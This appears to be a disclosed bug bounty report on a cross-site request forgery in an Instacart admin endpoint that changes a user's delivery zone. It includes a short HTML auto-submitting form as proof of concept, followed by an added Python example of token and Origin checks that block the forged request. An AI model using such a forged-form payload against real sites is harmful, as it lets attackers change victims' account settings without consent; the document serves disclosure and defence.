Instacart: Cross-Site Request Forgery (CSRF)

2016-08-09T21:52:49
ID H1:157993
Type hackerone
Reporter malcolmx
Modified 2016-10-13T20:21:53

Description

Hello,

I found a Cross-Site Request Forgery (CSRF) that can change any user's ZONE.

POC:

```html
<html>
<body>
  <!-- Form auto-posts to the zone endpoint; the victim's session cookie is attached by the browser -->
  <form action="https://admin.instacart.com/api/v2/zones" method="POST">
    <input type="hidden" name="zip" value="10001" />
    <input type="hidden" name="override" value="true" />
    <input type="submit" value="Submit request" />
  </form>
</body>
</html>
```

Put the zone you want, send the request to any user, and you will change his zone.

Please watch the POC I attached for more details. Thanks.
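The report shows why a cookie-authenticated, state-changing endpoint needs more than the session cookie to authorize a request: the browser attaches that cookie to a cross-site form POST automatically. Below is an added example of the server-side check a defender would want on such an endpoint. It is not Instacart's code and not part of the report; the handler, request and session shapes, the `ALLOWED_ORIGIN` value and the `update_zone` name are all assumptions for the demonstration. It combines a synchronizer token stored in the server-side session (compared in constant time) with an Origin/Referer check, and runs the report's forged POST beside a legitimate one so the difference is visible.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed example: a minimal synchronizer-token plus Origin check for a
# state-changing endpoint like the zone update in the report. None of this is
# Instacart's code; the request/session shapes are assumptions for the demo.

ALLOWED_ORIGIN = "https://admin.example.test"   # placeholder for the app's own origin


@dataclass
class Session:
    """Server-side session; the CSRF token lives here, not only in a cookie."""
    user_id: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Only the fields the check needs: method, headers, form body."""
    method: str
    headers: dict
    form: dict


def origin_is_trusted(headers: dict) -> bool:
    """Reject cross-site requests by Origin (falling back to Referer).

    Browsers attach Origin to cross-site form POSTs and a foreign page cannot
    forge it, so a foreign Origin is a reliable sign of CSRF. A request that
    carries neither header is treated as untrusted.
    """
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        p = urlparse(referer)
        origin = f"{p.scheme}://{p.netloc}"
    return origin == ALLOWED_ORIGIN


def token_is_valid(form: dict, session: Session) -> bool:
    """Compare the submitted token to the session's token in constant time."""
    submitted = form.get("csrf_token")
    if not submitted:
        return False
    return hmac.compare_digest(submitted, session.csrf_token)


def update_zone(request: Request, session: Session) -> tuple:
    """Handler for the state-changing POST; returns (status, message).

    Cookies alone are not proof of intent: the request must also carry a token
    that only a page served from our own origin could have read.
    """
    if request.method != "POST":
        return 405, "method not allowed"
    if not origin_is_trusted(request.headers):
        return 403, "rejected: cross-site origin"
    if not token_is_valid(request.form, session):
        return 403, "rejected: missing or invalid CSRF token"
    zip_code = request.form.get("zip", "")
    if not (zip_code.isdigit() and len(zip_code) == 5):
        return 400, "invalid zip"
    return 200, f"zone for user {session.user_id} set to {zip_code}"


def demo() -> tuple:
    """Run the forged and the legitimate request; return both status codes."""
    session = Session(user_id="victim")
    # Constructed: what the browser sends when the report's form is submitted
    # from an attacker-controlled page. The cookie rides along, but Origin is
    # foreign and the body has no token.
    forged = Request(
        method="POST",
        headers={"Origin": "https://attacker.example.test", "Cookie": "session=..."},
        form={"zip": "10001", "override": "true"},
    )
    # Constructed: the same POST issued from the application's own page.
    legit = Request(
        method="POST",
        headers={"Origin": ALLOWED_ORIGIN, "Cookie": "session=..."},
        form={"zip": "10001", "override": "true", "csrf_token": session.csrf_token},
    )
    forged_status, _ = update_zone(forged, session)
    legit_status, _ = update_zone(legit, session)
    return forged_status, legit_status


if __name__ == "__main__":
    print(demo())  # (403, 200)
```

Either check alone would already stop the PoC as written; keeping both covers the case where a client legitimately sends no Origin header (the token still has to match) and the case where a token leaks through some other bug (the origin still has to be our own). Setting the session cookie with `SameSite=Lax` or `Strict` is a third, independent layer.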